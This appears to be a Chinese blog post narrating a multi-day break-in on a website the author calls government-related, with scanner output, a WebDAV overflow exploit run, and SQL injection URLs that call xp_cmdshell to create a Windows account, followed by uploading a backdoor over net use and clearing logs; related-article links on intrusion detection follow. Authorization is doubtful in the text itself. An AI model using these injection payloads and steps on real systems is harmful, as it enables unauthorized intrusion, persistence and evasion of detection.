一次完整的入侵检测

原创 2012年03月28日 15:32:52
目标:取得管理员权限,在网站中留一个网页,收集漏洞情况。
 
  计划:第一天进行踩点,第二天测试进攻,第三天看看网站的论坛……最终取得管理员权限。
 
  1. 好久没有入侵了,很多都不会了,不过步骤还是要的。首先进行踩点(我踩踩踩!!),当然不是盲目的去扫描,先ping了一下他的网站。
 
  Ping www.inday.com
 
  Pinging www.inday.com [210.10.10.10] with 32 bytes of data:
 
  Reply from 210.10.10.10: bytes=32 time=60ms TTL=115
 
  Reply from 210.10.10.10: bytes=32 time=50ms TTL=115
 
  Reply from 210.10.10.10: bytes=32 time=50ms TTL=115
 
  Reply from 210.10.10.10: bytes=32 time=60ms TTL=115
 
  Ping statistics for 210.10.10.10:
 
  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
 
  Approximate round trip times in milli-seconds:
 
  Minimum = 50ms, Maximum = 60ms, Average = 55ms
 
  恩,速度不错,看了看TTL看来有什么路由或者防火墙之类的。
 
  打开浏览器,输入网址:http://www.inday.com 看了看,不错嘛,一个政府相关站点。稍微看了看,找到一个论坛,动网5.0的,网页采用asp的文章系统,不知道是哪个。可能有人会说用动网的洞直接得到密码就好拉,不错,这是一种方法,其实我是那里的管理员,想得到密码很容易,但此次入侵的目的就没达到了,所以我没用此方法。心想是如果实在不行,就利用动网的洞44。好,网站看好了,我在浏览器里输入了他的IP:210.10.10.10 晕!此页面无法显示。心想:不会吧,虚拟主机要我入侵,那怎么会是得到批准的呢??再说一般的虚拟主机都很稳定,管理员都非常负责。诶,管他呢,继续。
 
  基本的探测可以了,下面请出扫描器。很多人会选用1种扫描器进行网站测试,但我不认为这样很好,因为很多扫描器都有自己的特性。比如x-scan的详细,流光的快,还有一些针对特定漏洞的扫描器等等。所以这次我采用了很多扫描器。
 
  先我使用了流光5,不错吧,不要羡慕,我们联盟有下载,破解了时间和IP限制的。
 
  OK,开始扫描,如果你不会,那你看看流光的帮助好了,本文不谈如何使用。榕哥的作品就是好,虽然不知道流光5是不是榕哥做的,但很多都是基于流光4.7的。没到4分钟,扫描完毕,查看扫描记录:
 
  扫描 210.10.10.10 IIS5.0 NULL.Printer Exploit ...成功(不提了,从没成功过)
 
  PORT-> 主机 210.10.10.10 端口 0080 ...开放
 
  PORT-> 主机 210.10.10.10 端口 0021 ...开放 (不错,如果是虚拟主机空间就可以暴力破解)
 
  PORT-> 主机 210.10.10.10 端口 0110 ...开放
 
  PORT-> 主机 210.10.10.10 端口 0025 ...开放
 
  FTP-> 主机 210.10.10.10 FTP 版本信息 ... Serv-U FTP Server v4.0 for WinSock ready...(据说有溢出漏洞,等会再说)
 
  PORT-> 主机 210.10.10.10 端口 0139 ...开放 (失望,这种端口都看得见)
 
  IIS-> 主机 210.10.10.10 IIS检测 FrontPage 扩展 ...成功 (老漏洞了,不过我没成功过)
 
  PLUGIN-> 扫描 210.10.10.10 IIS 5.0 WEBDAV Exploit ...成功 (我喜欢,不过成功率很小)
 
  PORT-> 主机 210.10.10.10 端口 0443 ...开放
 
  PORT-> 主机 210.10.10.10 端口 1433 ...开放 (这个是关键点)
 
  太让人失望了,一台服务器开了那么多端口不说还有那么多漏洞。从流光的扫描中我看到一份非常重要的信息。此机的计算机名就是网站名字,而且看到开放了1433端口,所以在此我确信为主机托管(老兄,托错人了)。
 
  在这里我开始探测性的攻击了一次,使用的是webdav漏洞。
 
  D:\>webdavx3.pl 210.10.10.10
 
  IIS WebDAV overflow remote exploit by isno@xfocus.org
 
  start to try offset,
 
  if STOP a long time, you can press ^C and telnet 210.10.10.10 7788
 
  try offset: 0
 
  try offset: 1
 
  try offset: 2
 
  try offset: 3
 
  ………………
 
  没有成功,这里我感到很奇怪,webdav的溢出程序对没打补丁的机器(因为都是些老漏洞,一开始以为没打什么补丁,害我走了很多弯路)怎么不起作用啊(先前认为的,后面才知道错了)。
 
  今天的目的是踩点,所以这些资料是不够的,知己知彼,百战不殆。能有多的信息就尽量多。拿出x-scan进行探测……2分钟后,x-scan把我电脑资源吃光,被迫重启!◎¥◎#¥!◎#%
 
  好,GUI不行那cmd进行扫描,2分钟后……x-scan又把我资源耗尽,再次重启。眼睛冒火了◎◎◎◎
 
  开启肉鸡,3389的,不错吧,在这里谢谢海兄提供肉鸡:)
 
  好,在肉鸡上把该用的都下载来,先用x-scan扫描。机器好没办法,速度极快,大概10分钟后OK了。看看结果,呵呵,x-scan果然是好东西,比较具体。
 
  /iishelp/iis/misc/iirturnh.htw
 
  /iissamples/exair/search/qfullhit.htw
 
  /iissamples/exair/search/qsumrhit.htw
 
  /iissamples/issamples/oop/qfullhit.htw
 
  /iissamples/issamples/oop/qsumrhit.htw
 
  /scripts/samples/search/qfullhit.htw
 
  /scripts/samples/search/qsumrhit.htw
 
  /null.ida
 
  /null.idq
 
  /abczxv.htw
 
  /default.asp%81
 
  /default.asp
 
  一下子多了那么多CGI漏洞,而且还扫描出了一个令人兴奋的端口:3389。
 
  OK,再次探测性攻击,打开终端连接器,填入端口,1,2,3,看见登入画面了。看看输入法。。。。。晕死,打好了,怎么会???开始疑惑了。算了,看看其他的吧。我把上面的漏洞找了遍,都没成功,看来运气不好,不过有一个漏洞到成功了,但是路径没猜对。/scripts/samples/search/qfullhit.htw
 
  在绿盟的漏洞资料里查到这个漏洞存在着越界查看漏洞,就是说可以查看任意文件。可是。。。。因为不知道具体路进,都没成功,而且他的web站点放在了D盘,所以没有成功(事后知道的)。CGI啊CGI为什么我老不行呢?不相信,随后去了绿盟找了点EXPilot,编译后进行探测攻击,X,失败告终。。
 
  难道非要我从论坛入手???我偏不要。冷静下来后我决定再次看看网页,随后又找了扫描器老大哥SSS进行扫描。
 
  在观察网页种,无疑进入了下载页面,看来还没做好。无疑间我点了回首页的连接,晕,卡住了,看看连接地址,晕,file://d:/defual.asp 百密必有一疏,看到路径了,可。。。。两个盘符,跨盘符好像没提到,不管了,先试试吧,10分钟过去,依然不行,看来又走不通了。看看肉鸡的SSS扫描结果,老大哥就是老大哥,没话说,对于CGI的准确性非常厉害,那些漏洞虽然扫出来了,但前面有个X说明是个幌子,不过有一个,查找资料。绿盟竟然没有??那去google看看,找到几个,看了看漏洞介绍,针对iis4.0的,晕,白开心了,那怎么入手呢????
 
  看了看时间,2点了,明天上课,所以今天倒此了,不过目的达到了,毕竟今天的任务是踩点。睡觉先。
 
  第二天,晚上9点,呵呵,精神来了,继续昨天的排演。本来今天想整理下资料看看的,可还是不死心,又开始了扫描,结果一样。
 
  刚想起来是有MSsql数据库的,找找最新的资料,看到MYSQL有溢出漏洞,编译了攻击程序,试验了下,结果是,失败:( 看看网页吧。
 
  找到一个网管信箱,看看。。。。。。。是webclint邮件服务器,看看版本,晕,6.8的,我记得的漏洞是2.4的,看来又不行了,诶,真不甘心。看看文章系统吧,总觉得是免费的文章系统,不过是利用SQL数据库的。先看看他的查询:
 
  http://www.inday.com/gunye.asp?boardID=5
 
  http://www.inday.com/news.asp?boardID=2
 
  下面都雷同,只是asp页不同,关键语句是boardID,使用的查询语句可能是
 
  "select * from where boardid="&boardid&"……
 
  后面我就猜不到了,再看看新闻页面
 
  http://www.inday.com/ShowAnnounce.asp?boardID=2&RootID=1194&ID=1194&tion=7
 
  标准的新闻系统,呵呵,那我们来44SQL 注入攻击看看。注意,SQL注入问题非常严重,请大家不要乱用下面的演示。相关资料网上已经有很多了,这里不再介绍。
 
  我使用了http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin RHC进行查看,返回了语法错误,我再继续
 
  http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin hax--,返回
 
  ADODB.Recordset 错误 '800a0cb3'
 
  当前记录集不支持书签。这可能是提供程序或选定的游标类型的限制。
 
  /news.asp,行358
 
  成功,yeah~~~~~~~~兴奋中!!!
 
  然后我就一步一步添加了一个用户。哦,对了,还没说这个漏洞呢,这个漏洞是针对ASP+SQL的,一些asp页面没有进行过滤,使攻击者能执行任意命令,很简单,SQL我想大家都知道吧,如果得到用户密码就等于知道了这台主机的控制权。那我在SQL里创建一个本地用户没有问题吧,好我们来创建。以下程序很危险,请勿试。这里提一下,后面的—是SQL语句的注释,那后面的语句就不起作用了,嘿嘿。
 
  http://www.inday.com/news.asp?id=2;exec master.dbo.sp_addlogin RHC;--
 
  http://www.inday.com/news.asp?id=2;exec master.dbo.sp_password RHC,www.realhack.org;--
 
  http://www.inday.com/news.asp?id=2;exec master.dbo.xp_cmdshell 'net user RHC www.realhack.org /workstations:* /times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
 
  哈哈,创建了一个RHC用户,密码为www.realhack.org。现在那个3389就可以用了,打开终端连接器,输入用户名和密码,OK,进入。。进入。。。进入。。。。。。。!!!!终端已经超过最大连接数。。。。。狂晕!!
 
  这时候我们的目的基本达到了,该是清理战场,然后写报告的时候了。既然3389不能进,但是139还开着,OK,net use 上去,我传了朋友做的一个后门程序,然后看了看他们的配置和web的存放位置,和我猜的没错,采用分盘管理。很严谨。在C盘,意外看见了w2ksp3补丁 ,看来先前的失败是有原因的。好了,清理日记。

异常检测之浅谈入侵检测

打开微信扫一扫,关注微信公众号【数据与算法联盟】 转载请注明出处:http://blog.csdn.net/gamer_gyt 博主微博:http://weibo.com/234654758...

基于深度学习的入侵检测记录一

写在开头  刚上研究生,老师初期打算安排给我基于深度学习的入侵检测课题。我打算以博客的形式记录自己的学习历程,一来勉励自己,二来加深印象。   学习一项新的知识,首先要培养自己的兴趣,其次要明白自己...

基于深度学习的行人入侵检测

行人入侵检测项目适用于公安等管理部门针对场景进行行人监控,项目作用点比较广泛! 博主近些天用c写了一个基于深度学习的行人入侵检测工程,可通用摄像头视角。...
  • samylee
  • samylee
  • 2017年07月15日 15:45
  • 629

基于深度学习的入侵检测记录二

写在前面  我们已经了解了深度学习的基本概念,但是还不了解它具体如何实现。设想一下,如果让你来实现深度学习,你会如何做?就以图像识别为例,比方说一辆摩托车,如何让机器做出正确的选择?   我试图以通...

一套非常完整的snort入侵检测

  • 2017年10月24日 17:12
  • 10.79MB
  • 下载

Libnids库-网络入侵检测的基础框架

1.Libnids介绍:    Libnids(library  network intrusion detection system)是网络入侵检测开发的专业编程接口,实现了网络入侵检测系统的基本...

Java Web中的入侵检测及简单实现

一、简介   在Java Web应用程中,特别是网站开发中,我们有时候需要为应用程序增加一个入侵检测程序来防止恶意刷新的功能,防止非法用户不断的往Web应用中重复发送数据。当然,入侵检测可以用很...

安全运维之:Linux后门入侵检测工具的使用

一、rootkit简介 rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发...

Web 应用程序常见漏洞 CSRF 的入侵检测与防范

简介: 互联网的安全问题一直存在,并且在可预见的未来中没有消弭的迹象,而在软件开发周期中,加入对产品安全问题的检测工作,将极大的提升对应安全问题解决的成本,对维护一个好的产品形象至关重,在竞争愈烈的网...
  • xysoul
  • xysoul
  • 2015年05月03日 18:57
  • 6584

AIDE文件系统高级入侵检测

AIDE --(文件系统)高级入侵检测 1、aide的概述 AIDE(Adevanced Intrusion Detection Environment,高级入侵检测环境)是个入侵检测工具,主要用...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:一次完整的入侵检测
举报原因:
原因补充:

(最多只允许输入30个字)